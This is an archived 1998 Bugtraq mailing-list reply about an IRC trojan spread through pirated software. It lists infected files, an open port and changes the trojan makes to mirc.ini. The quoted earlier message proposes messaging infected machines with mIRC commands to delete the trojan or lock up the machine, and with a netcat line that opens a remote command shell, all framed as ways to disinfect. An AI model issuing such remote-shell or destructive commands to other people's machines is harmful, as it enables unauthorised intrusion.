OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 4th quarter (Oct-Dec) 1998: Re: Internet Wide DOS Attack using IRC

Re: Internet Wide DOS Attack using IRC

Samuel Cossette (clusterVIDEOTRON.CA)
Sat, 3 Oct 1998 14:41:54 -0400 

It's not the DO command of mirc, it's a buildin command, it's the equivalent
of /QUOTE or /RAW in a irc client, this is send the data directly to the
server

At this time I have found 2 directly file infected:

Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on
#warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also
included.

Another interesting thing, the server open the port 15150, this is prompt:
Enter your username:, probably a FTPD

The trojan can also modify you mirc.ini, this is add auto-op, and modify
your current script.

>
>With the DO command enabled, they gave us the means to remotely disable
>this trojan.
>
>Something to the effect of;
>
>msg <nick> .do del c:\windows\system\oce*.*
>
>Then, msg <nick> .do <some evil command to lock up the machine, forcing a
>reboot>.
>

...
>
>The mIRC DO command is very powerful, and can be used to install netcat on
>the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
>-p <any port> <your ip> -t -e command.com, giving a remote command prompt
>to investigate/disinfect the machine.
>
>
>___________________________________________________________________________
___
>George Imburgia                                      e-mail:
gtihopi.dtcc.edu
>Systems Administrator                                Phone:  (302)739-4068
>Delaware Technical & Community College               Fax:    (302)739-3345
>Office of the President                              Pager:  (302)741-5962

Samuel Cossette
clustervideotron.ca